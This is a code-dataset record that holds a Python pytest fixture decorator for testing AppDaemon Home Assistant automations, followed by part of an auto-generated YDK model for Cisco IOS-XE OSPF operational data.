return list(func_parameters.keys()) != ["self"]
def __init___was_overridden():
return '__init__' in automation_class.__dict__
# noinspection PyPep8Naming,SpellCheckingInspection
def not_subclass_of_Hass():
return not issubclass(automation_class, Hass)
if not function_exist_in_automation_class('initialize'):
raise AutomationFixtureError(
f"'{automation_class.__name__}' has no 'initialize' function! Make sure you implemented it!")
if function_has_arguments_other_than_self('initialize'):
raise AutomationFixtureError(
f"'{automation_class.__name__}' 'initialize' should have no arguments other than 'self'!")
if __init___was_overridden():
raise AutomationFixtureError(f"'{automation_class.__name__}' should not override '__init__'")
if not_subclass_of_Hass():
raise AutomationFixtureError(f"'{automation_class.__name__}' should be a subclass of 'Hass'")
class _AutomationFixtureDecoratorWithoutArgs:
def __init__(self, automation_classes):
self.automation_classes = automation_classes
for automation in self.automation_classes:
ensure_automation_is_valid(automation)
def __call__(self, function):
@pytest.fixture(params=self.automation_classes, ids=self._generate_id)
def automation_fixture_with_initialisation(request, given_that, hass_functions, hass_mocks):
automation_class = request.param
return _instantiate_and_initialize_automation(function, automation_class, given_that, hass_functions, hass_mocks)
return automation_fixture_with_initialisation
def _generate_id(self, automation_classes):
return automation_classes.__name__
class _AutomationFixtureDecoratorWithArgs:
def __init__(self, automation_classes_with_args):
self.automation_classes_with_args = automation_classes_with_args
for automation, _args in self.automation_classes_with_args:
ensure_automation_is_valid(automation)
def __call__(self, function):
@pytest.fixture(params=self.automation_classes_with_args, ids=self._generate_id)
def automation_fixture_with_initialisation(request, given_that, hass_functions, hass_mocks):
automation_class = request.param[0]
automation_args = request.param[1]
automation = _instantiate_and_initialize_automation(
function, automation_class, given_that, hass_functions, hass_mocks)
return (automation, automation_args)
return automation_fixture_with_initialisation
def _generate_id(self, automation_classes_with_args):
return automation_classes_with_args[0].__name__
def automation_fixture(*args):
"""
Decorator to seamlessly initialize and inject an automation fixture
4 Versions:
- Single Class: @automation_fixture(MyAutomation)
- Multiple Classes: @automation_fixture(MyAutomation, MyOtherAutomation)
- Single Class w/ params: @automation_fixture((upstairs.Bedroom, {'motion': 'binary_sensor.bedroom_motion'}))
- Multiple Classes w/ params: @automation_fixture(
(upstairs.Bedroom, {'motion': 'binary_sensor.bedroom_motion'}),
(upstairs.Bathroom, {'motion': 'binary_sensor.bathroom_motion'}),
)
When multiple classes are passed, tests will be generated for each automation.
When using parameters, the injected object will be a tuple: `(Initialized_Automation, params)`
# Pre-initialization setup
All code in the `@automation_fixture` function will be executed before initializing the `automation_class`
3 fixtures are injectable in `@automation_fixture`: 'given_that', 'hass_mocks' and 'hass_functions'
'hass_functions' is deprecated in favor of 'hass_mocks'
Examples:
```python
@automation_fixture(Bathroom)
def bathroom():
pass
# -> `Bathroom` automation will be initialized and available in tests as `bathroom`
---
@automation_fixture(Bathroom)
def bathroom(given_that):
given_that.time_is(time(hour=13))
# -> 1. `given_that.time_is(time(hour=13))` will be called
# -> 2. `Bathroom` automation will be initialized and available in tests as `bathroom`
```
Do not return anything, any returned object will be ignored
"""
if not args or isfunction(args[0]):
raise AutomationFixtureError(
'Do not forget to pass the automation class(es) as argument')
if type(args[0]) is not tuple:
automation_classes = args
return _AutomationFixtureDecoratorWithoutArgs(automation_classes)
else:
automation_classes_with_args = args
return _AutomationFixtureDecoratorWithArgs(automation_classes_with_args)
| 38.844444
| 149
| 0.707809
|
import warnings
from inspect import isfunction, signature
import pkg_resources
import pytest
from appdaemon.plugins.hass.hassapi import Hass
from appdaemontestframework.common import AppdaemonTestFrameworkError
class AutomationFixtureError(AppdaemonTestFrameworkError):
pass
def _instantiate_and_initialize_automation(function, automation_class, given_that, hass_functions, hass_mocks):
_inject_helpers_and_call_function(function, given_that, hass_functions, hass_mocks)
automation = automation_class(
None,
automation_class.__name__,
None,
None,
None,
None,
None
)
automation.initialize()
given_that.mock_functions_are_cleared()
return automation
def _inject_helpers_and_call_function(function, given_that, hass_functions, hass_mocks):
injectable_fixtures = {
'given_that': given_that,
'hass_functions': hass_functions,
'hass_mocks': hass_mocks,
}
def _check_valid(param):
if param not in injectable_fixtures:
raise AutomationFixtureError(
f"'{param}' is not a valid fixture! | The only fixtures injectable in '@automation_fixture' are: {list(injectable_fixtures.keys())}")
if param == 'hass_functions':
warnings.warn(
"""
Injecting `hass_functions` into automation fixtures is deprecated.
Replace `hass_functions` with `hass_mocks` injections and access hass_functions with `hass_mocks.hass_functions`
""",
DeprecationWarning)
args = []
for param in signature(function).parameters:
_check_valid(param)
args.append(injectable_fixtures.get(param))
function(*tuple(args))
def ensure_automation_is_valid(automation_class):
def function_exist_in_automation_class(func_name):
return func_name in dir(automation_class)
def function_has_arguments_other_than_self(func_name):
func_parameters = signature(getattr(automation_class, func_name)).parameters
return list(func_parameters.keys()) != ["self"]
def __init___was_overridden():
return '__init__' in automation_class.__dict__
def not_subclass_of_Hass():
return not issubclass(automation_class, Hass)
if not function_exist_in_automation_class('initialize'):
raise AutomationFixtureError(
f"'{automation_class.__name__}' has no 'initialize' function! Make sure you implemented it!")
if function_has_arguments_other_than_self('initialize'):
raise AutomationFixtureError(
f"'{automation_class.__name__}' 'initialize' should have no arguments other than 'self'!")
if __init___was_overridden():
raise AutomationFixtureError(f"'{automation_class.__name__}' should not override '__init__'")
if not_subclass_of_Hass():
raise AutomationFixtureError(f"'{automation_class.__name__}' should be a subclass of 'Hass'")
class _AutomationFixtureDecoratorWithoutArgs:
def __init__(self, automation_classes):
self.automation_classes = automation_classes
for automation in self.automation_classes:
ensure_automation_is_valid(automation)
def __call__(self, function):
@pytest.fixture(params=self.automation_classes, ids=self._generate_id)
def automation_fixture_with_initialisation(request, given_that, hass_functions, hass_mocks):
automation_class = request.param
return _instantiate_and_initialize_automation(function, automation_class, given_that, hass_functions, hass_mocks)
return automation_fixture_with_initialisation
def _generate_id(self, automation_classes):
return automation_classes.__name__
class _AutomationFixtureDecoratorWithArgs:
def __init__(self, automation_classes_with_args):
self.automation_classes_with_args = automation_classes_with_args
for automation, _args in self.automation_classes_with_args:
ensure_automation_is_valid(automation)
def __call__(self, function):
@pytest.fixture(params=self.automation_classes_with_args, ids=self._generate_id)
def automation_fixture_with_initialisation(request, given_that, hass_functions, hass_mocks):
automation_class = request.param[0]
automation_args = request.param[1]
automation = _instantiate_and_initialize_automation(
function, automation_class, given_that, hass_functions, hass_mocks)
return (automation, automation_args)
return automation_fixture_with_initialisation
def _generate_id(self, automation_classes_with_args):
return automation_classes_with_args[0].__name__
def automation_fixture(*args):
if not args or isfunction(args[0]):
raise AutomationFixtureError(
'Do not forget to pass the automation class(es) as argument')
if type(args[0]) is not tuple:
automation_classes = args
return _AutomationFixtureDecoratorWithoutArgs(automation_classes)
else:
automation_classes_with_args = args
return _AutomationFixtureDecoratorWithArgs(automation_classes_with_args)
| true
| true
|
f705aabf435e5694deac5786cce3a35968d77640
| 805,471
|
py
|
Python
|
cisco-ios-xe/ydk/models/cisco_ios_xe/Cisco_IOS_XE_ospf_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 177
|
2016-03-15T17:03:51.000Z
|
2022-03-18T16:48:44.000Z
|
cisco-ios-xe/ydk/models/cisco_ios_xe/Cisco_IOS_XE_ospf_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 18
|
2016-03-30T10:45:22.000Z
|
2020-07-14T16:28:13.000Z
|
cisco-ios-xe/ydk/models/cisco_ios_xe/Cisco_IOS_XE_ospf_oper.py
|
CiscoDevNet/ydk-py
|
073731fea50694d0bc6cd8ebf10fec308dcc0aa9
|
[
"ECL-2.0",
"Apache-2.0"
] | 85
|
2016-03-16T20:38:57.000Z
|
2022-02-22T04:26:02.000Z
|
""" Cisco_IOS_XE_ospf_oper
This module contains a collection of YANG definitions for
monitoring the operation of ospf protocol in a Network Element.
Copyright (c) 2016\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
from collections import OrderedDict
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class AddressFamily(Enum):
"""
AddressFamily (Enum Class)
Address family type
.. data:: address_family_ipv4 = 0
.. data:: address_family_ipv6 = 1
"""
address_family_ipv4 = Enum.YLeaf(0, "address-family-ipv4")
address_family_ipv6 = Enum.YLeaf(1, "address-family-ipv6")
class NbrStateType(Enum):
"""
NbrStateType (Enum Class)
OSPF neighbor state type
.. data:: ospf_nbr_down = 1
Neighbor state down
.. data:: ospf_nbr_attempt = 2
Neighbor attempt state
.. data:: ospf_nbr_init = 3
Neighbor init state
.. data:: ospf_nbr_two_way = 4
Neighbor 2-way state
.. data:: ospf_nbr_exchange_start = 5
Neighbor exchange start state
.. data:: ospf_nbr_exchange = 6
Neighbor exchange state
.. data:: ospf_nbr_loading = 7
Neighbor loading state
.. data:: ospf_nbr_full = 8
Neighbor full state
"""
ospf_nbr_down = Enum.YLeaf(1, "ospf-nbr-down")
ospf_nbr_attempt = Enum.YLeaf(2, "ospf-nbr-attempt")
ospf_nbr_init = Enum.YLeaf(3, "ospf-nbr-init")
ospf_nbr_two_way = Enum.YLeaf(4, "ospf-nbr-two-way")
ospf_nbr_exchange_start = Enum.YLeaf(5, "ospf-nbr-exchange-start")
ospf_nbr_exchange = Enum.YLeaf(6, "ospf-nbr-exchange")
ospf_nbr_loading = Enum.YLeaf(7, "ospf-nbr-loading")
ospf_nbr_full = Enum.YLeaf(8, "ospf-nbr-full")
class OspfAuthType(Enum):
"""
OspfAuthType (Enum Class)
OSPF Authentication type
.. data:: ospf_auth_ipsec = 0
.. data:: ospf_auth_trailer_keychain = 1
.. data:: ospf_auth_trailer_key = 2
.. data:: ospf_auth_type_none = 3
"""
ospf_auth_ipsec = Enum.YLeaf(0, "ospf-auth-ipsec")
ospf_auth_trailer_keychain = Enum.YLeaf(1, "ospf-auth-trailer-keychain")
ospf_auth_trailer_key = Enum.YLeaf(2, "ospf-auth-trailer-key")
ospf_auth_type_none = Enum.YLeaf(3, "ospf-auth-type-none")
class OspfExternalMetricType(Enum):
"""
OspfExternalMetricType (Enum Class)
External metric type
.. data:: ospf_ext_metric_type_1 = 0
.. data:: ospf_ext_metric_type_2 = 1
"""
ospf_ext_metric_type_1 = Enum.YLeaf(0, "ospf-ext-metric-type-1")
ospf_ext_metric_type_2 = Enum.YLeaf(1, "ospf-ext-metric-type-2")
class OspfNetworkType(Enum):
"""
OspfNetworkType (Enum Class)
OSPF network type
.. data:: ospf_broadcast = 0
OSPF broadcast multi-access network
.. data:: ospf_non_broadcast = 1
OSPF Non-Broadcast Multi-Access (NBMA) network
.. data:: ospf_point_to_multipoint = 2
OSPF point-to-multipoint network
.. data:: ospf_point_to_point = 3
OSPF point-to-point network
"""
ospf_broadcast = Enum.YLeaf(0, "ospf-broadcast")
ospf_non_broadcast = Enum.YLeaf(1, "ospf-non-broadcast")
ospf_point_to_multipoint = Enum.YLeaf(2, "ospf-point-to-multipoint")
ospf_point_to_point = Enum.YLeaf(3, "ospf-point-to-point")
class OspfOperationMode(Enum):
"""
OspfOperationMode (Enum Class)
OSPF operational mode
.. data:: ospf_ships_in_the_night = 0
Ships-in-the-night operation mode in which each OSPF instance carries only one address family
"""
ospf_ships_in_the_night = Enum.YLeaf(0, "ospf-ships-in-the-night")
class Ospfv2AuthTypeSelection(Enum):
"""
Ospfv2AuthTypeSelection (Enum Class)
The authentication type
.. data:: ospfv2_auth_none = 0
No authentication configured
.. data:: ospfv2_auth_trailer_key = 1
Authentication uses the trailer key
.. data:: ospfv2_auth_trailer_key_chain = 2
Authentication uses a trailer key chain
"""
ospfv2_auth_none = Enum.YLeaf(0, "ospfv2-auth-none")
ospfv2_auth_trailer_key = Enum.YLeaf(1, "ospfv2-auth-trailer-key")
ospfv2_auth_trailer_key_chain = Enum.YLeaf(2, "ospfv2-auth-trailer-key-chain")
class Ospfv2CryptoAlgorithm(Enum):
"""
Ospfv2CryptoAlgorithm (Enum Class)
The algorithm in use
.. data:: ospfv2_crypto_cleartest = 0
The OSPFv2 authentication is sent as cleartext
.. data:: ospfv2_crypto_md5 = 1
The OSPFv2 authentication is encrypted using
Message Digest 5
"""
ospfv2_crypto_cleartest = Enum.YLeaf(0, "ospfv2-crypto-cleartest")
ospfv2_crypto_md5 = Enum.YLeaf(1, "ospfv2-crypto-md5")
class Ospfv2IntfState(Enum):
"""
Ospfv2IntfState (Enum Class)
The possible states that an interface can be in
.. data:: ospfv2_interface_state_down = 0
The interface is in the down state
.. data:: ospfv2_interface_state_loopback = 1
The interface is in loopback state
.. data:: ospfv2_interface_state_waiting = 2
The interface is in waiting state
.. data:: ospfv2_interface_state_point_to_mpoint = 3
The interface is in point-to-multipoint state
.. data:: ospfv2_interface_state_point_to_point = 4
The interface is in point-to-point state
.. data:: ospfv2_interface_state_dr = 5
The interface is in the designated router state
.. data:: ospfv2_interface_state_backup = 6
The interface is providing backup for another
interface
.. data:: ospfv2_interface_state_other = 7
The interface is in a state other than the ones
nummerated in this list
"""
ospfv2_interface_state_down = Enum.YLeaf(0, "ospfv2-interface-state-down")
ospfv2_interface_state_loopback = Enum.YLeaf(1, "ospfv2-interface-state-loopback")
ospfv2_interface_state_waiting = Enum.YLeaf(2, "ospfv2-interface-state-waiting")
ospfv2_interface_state_point_to_mpoint = Enum.YLeaf(3, "ospfv2-interface-state-point-to-mpoint")
ospfv2_interface_state_point_to_point = Enum.YLeaf(4, "ospfv2-interface-state-point-to-point")
ospfv2_interface_state_dr = Enum.YLeaf(5, "ospfv2-interface-state-dr")
ospfv2_interface_state_backup = Enum.YLeaf(6, "ospfv2-interface-state-backup")
ospfv2_interface_state_other = Enum.YLeaf(7, "ospfv2-interface-state-other")
class Ospfv2LsaType(Enum):
"""
Ospfv2LsaType (Enum Class)
Link State Advertisement type
.. data:: ospfv2_lsa_type_unsupported_lsa_type = 0
.. data:: ospfv2_lsa_type_router = 1
.. data:: ospfv2_lsa_type_network = 2
.. data:: ospfv2_lsa_type_summary_net = 3
.. data:: ospfv2_lsa_type_summary_router = 4
.. data:: ospfv2_lsa_type_as_external = 5
.. data:: ospfv2_lsa_type_nssa = 6
.. data:: ospfv2_lsa_type_link_scope_opaque = 7
.. data:: ospfv2_lsa_type_area_scope_opaque = 8
.. data:: ospfv2_lsa_type_as_scope_opaque = 9
"""
ospfv2_lsa_type_unsupported_lsa_type = Enum.YLeaf(0, "ospfv2-lsa-type-unsupported-lsa-type")
ospfv2_lsa_type_router = Enum.YLeaf(1, "ospfv2-lsa-type-router")
ospfv2_lsa_type_network = Enum.YLeaf(2, "ospfv2-lsa-type-network")
ospfv2_lsa_type_summary_net = Enum.YLeaf(3, "ospfv2-lsa-type-summary-net")
ospfv2_lsa_type_summary_router = Enum.YLeaf(4, "ospfv2-lsa-type-summary-router")
ospfv2_lsa_type_as_external = Enum.YLeaf(5, "ospfv2-lsa-type-as-external")
ospfv2_lsa_type_nssa = Enum.YLeaf(6, "ospfv2-lsa-type-nssa")
ospfv2_lsa_type_link_scope_opaque = Enum.YLeaf(7, "ospfv2-lsa-type-link-scope-opaque")
ospfv2_lsa_type_area_scope_opaque = Enum.YLeaf(8, "ospfv2-lsa-type-area-scope-opaque")
ospfv2_lsa_type_as_scope_opaque = Enum.YLeaf(9, "ospfv2-lsa-type-as-scope-opaque")
class OspfOperData(Entity):
"""
Operational state of ospf
.. attribute:: ospf_state
OSPF operational state
**type**\: :py:class:`OspfState <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState>`
**presence node**\: True
**config**\: False
.. attribute:: ospfv2_instance
The OSPF instance
**type**\: list of :py:class:`Ospfv2Instance <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.Ospfv2Instance>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData, self).__init__()
self._top_entity = None
self.yang_name = "ospf-oper-data"
self.yang_parent_name = "Cisco-IOS-XE-ospf-oper"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("ospf-state", ("ospf_state", OspfOperData.OspfState)), ("ospfv2-instance", ("ospfv2_instance", OspfOperData.Ospfv2Instance))])
self._leafs = OrderedDict()
self.ospf_state = None
self._children_name_map["ospf_state"] = "ospf-state"
self.ospfv2_instance = YList(self)
self._segment_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData, [], name, value)
class OspfState(Entity):
"""
OSPF operational state
.. attribute:: op_mode
OSPF operation mode
**type**\: :py:class:`OspfOperationMode <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperationMode>`
**config**\: False
.. attribute:: ospf_instance
OSPF routing protocol instance
**type**\: list of :py:class:`OspfInstance <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance>`
**config**\: False
This class is a :ref:`presence class<presence-class>`
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState, self).__init__()
self.yang_name = "ospf-state"
self.yang_parent_name = "ospf-oper-data"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("ospf-instance", ("ospf_instance", OspfOperData.OspfState.OspfInstance))])
self.is_presence_container = True
self._leafs = OrderedDict([
('op_mode', (YLeaf(YType.enumeration, 'op-mode'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfOperationMode', '')])),
])
self.op_mode = None
self.ospf_instance = YList(self)
self._segment_path = lambda: "ospf-state"
self._absolute_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState, ['op_mode'], name, value)
class OspfInstance(Entity):
"""
OSPF routing protocol instance
.. attribute:: af (key)
Address\-family of the instance
**type**\: :py:class:`AddressFamily <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.AddressFamily>`
**config**\: False
.. attribute:: router_id (key)
Defined in RFC 2328. A 32\-bit number that uniquely identifies the router
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ospf_area
List of ospf areas
**type**\: list of :py:class:`OspfArea <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea>`
**config**\: False
.. attribute:: link_scope_lsas
List OSPF link scope LSA
**type**\: list of :py:class:`LinkScopeLsas <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.LinkScopeLsas>`
**config**\: False
.. attribute:: multi_topology
OSPF multi\-topology interface augmentation
**type**\: list of :py:class:`MultiTopology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.MultiTopology>`
**config**\: False
.. attribute:: process_id
The process identifier used to refer to this instance
**type**\: int
**range:** 0..65535
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance, self).__init__()
self.yang_name = "ospf-instance"
self.yang_parent_name = "ospf-state"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['af','router_id']
self._child_classes = OrderedDict([("ospf-area", ("ospf_area", OspfOperData.OspfState.OspfInstance.OspfArea)), ("link-scope-lsas", ("link_scope_lsas", OspfOperData.OspfState.OspfInstance.LinkScopeLsas)), ("multi-topology", ("multi_topology", OspfOperData.OspfState.OspfInstance.MultiTopology))])
self._leafs = OrderedDict([
('af', (YLeaf(YType.enumeration, 'af'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'AddressFamily', '')])),
('router_id', (YLeaf(YType.uint32, 'router-id'), ['int'])),
('process_id', (YLeaf(YType.uint16, 'process-id'), ['int'])),
])
self.af = None
self.router_id = None
self.process_id = None
self.ospf_area = YList(self)
self.link_scope_lsas = YList(self)
self.multi_topology = YList(self)
self._segment_path = lambda: "ospf-instance" + "[af='" + str(self.af) + "']" + "[router-id='" + str(self.router_id) + "']"
self._absolute_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data/ospf-state/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance, ['af', 'router_id', 'process_id'], name, value)
class OspfArea(Entity):
"""
List of ospf areas
.. attribute:: area_id (key)
OSPF area ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: ospf_interface
List of OSPF interfaces
**type**\: list of :py:class:`OspfInterface <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface>`
**config**\: False
.. attribute:: area_scope_lsa
List of OSPF area scope LSA
**type**\: list of :py:class:`AreaScopeLsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea, self).__init__()
self.yang_name = "ospf-area"
self.yang_parent_name = "ospf-instance"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['area_id']
self._child_classes = OrderedDict([("ospf-interface", ("ospf_interface", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface)), ("area-scope-lsa", ("area_scope_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.AreaScopeLsa))])
self._leafs = OrderedDict([
('area_id', (YLeaf(YType.uint32, 'area-id'), ['int'])),
])
self.area_id = None
self.ospf_interface = YList(self)
self.area_scope_lsa = YList(self)
self._segment_path = lambda: "ospf-area" + "[area-id='" + str(self.area_id) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea, ['area_id'], name, value)
class OspfInterface(Entity):
"""
List of OSPF interfaces
.. attribute:: name (key)
Interface name
**type**\: str
**config**\: False
.. attribute:: network_type
Network type
**type**\: :py:class:`OspfNetworkType <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfNetworkType>`
**config**\: False
.. attribute:: passive
Enable/Disable passive
**type**\: bool
**config**\: False
.. attribute:: demand_circuit
Enable/Disable demand circuit
**type**\: bool
**config**\: False
.. attribute:: multi_area
Multi Area
**type**\: :py:class:`MultiArea <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea>`
**config**\: False
.. attribute:: static_neighbor
Staticly configured neighbors
**type**\: list of :py:class:`StaticNeighbor <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.StaticNeighbor>`
**config**\: False
.. attribute:: node_flag
Set prefix as a node representative prefix
**type**\: bool
**config**\: False
.. attribute:: fast_reroute
Fast reroute config
**type**\: :py:class:`FastReroute <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute>`
**config**\: False
.. attribute:: cost
Interface cost
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: hello_interval
Time between hello packets
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: dead_interval
Interval after which a neighbor is declared dead
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: retransmit_interval
Time between retransmitting unacknowledged Link State Advertisements (LSAs)
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: transmit_delay
Estimated time needed to send link\-state update
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: mtu_ignore
Enable/Disable ignoring of MTU in DBD packets
**type**\: bool
**config**\: False
.. attribute:: lls
Enable/Disable link\-local signaling (LLS) support
**type**\: bool
**config**\: False
.. attribute:: prefix_suppression
Suppress advertisement of the prefixes
**type**\: bool
**config**\: False
.. attribute:: bfd
Enable/disable bfd
**type**\: bool
**config**\: False
.. attribute:: ttl_security
TTL security
**type**\: :py:class:`TtlSecurity <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity>`
**config**\: False
.. attribute:: enable
Enable/disable protocol on the interface
**type**\: bool
**config**\: False
.. attribute:: authentication
Authentication configuration
**type**\: :py:class:`Authentication <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication>`
**config**\: False
.. attribute:: state
Interface state
**type**\: str
**config**\: False
.. attribute:: hello_timer
Hello timer
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: wait_timer
Wait timer
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: dr
Designated Router
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: bdr
Backup Designated Router
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ospf_neighbor
List of OSPF neighbors
**type**\: list of :py:class:`OspfNeighbor <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor>`
**config**\: False
.. attribute:: intf_link_scope_lsas
List OSPF link scope LSAs
**type**\: list of :py:class:`IntfLinkScopeLsas <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas>`
**config**\: False
.. attribute:: intf_multi_topology
OSPF interface topology
**type**\: list of :py:class:`IntfMultiTopology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfMultiTopology>`
**config**\: False
.. attribute:: priority
Configure OSPF router priority
**type**\: int
**range:** 0..255
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface, self).__init__()
self.yang_name = "ospf-interface"
self.yang_parent_name = "ospf-area"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['name']
self._child_classes = OrderedDict([("multi-area", ("multi_area", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.MultiArea)), ("static-neighbor", ("static_neighbor", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.StaticNeighbor)), ("fast-reroute", ("fast_reroute", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.FastReroute)), ("ttl-security", ("ttl_security", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.TtlSecurity)), ("authentication", ("authentication", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.Authentication)), ("ospf-neighbor", ("ospf_neighbor", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.OspfNeighbor)), ("intf-link-scope-lsas", ("intf_link_scope_lsas", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas)), ("intf-multi-topology", ("intf_multi_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfMultiTopology))])
self._leafs = OrderedDict([
('name', (YLeaf(YType.str, 'name'), ['str'])),
('network_type', (YLeaf(YType.enumeration, 'network-type'), [('ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper', 'OspfNetworkType', '')])),
('passive', (YLeaf(YType.boolean, 'passive'), ['bool'])),
('demand_circuit', (YLeaf(YType.boolean, 'demand-circuit'), ['bool'])),
('node_flag', (YLeaf(YType.boolean, 'node-flag'), ['bool'])),
('cost', (YLeaf(YType.uint16, 'cost'), ['int'])),
('hello_interval', (YLeaf(YType.uint16, 'hello-interval'), ['int'])),
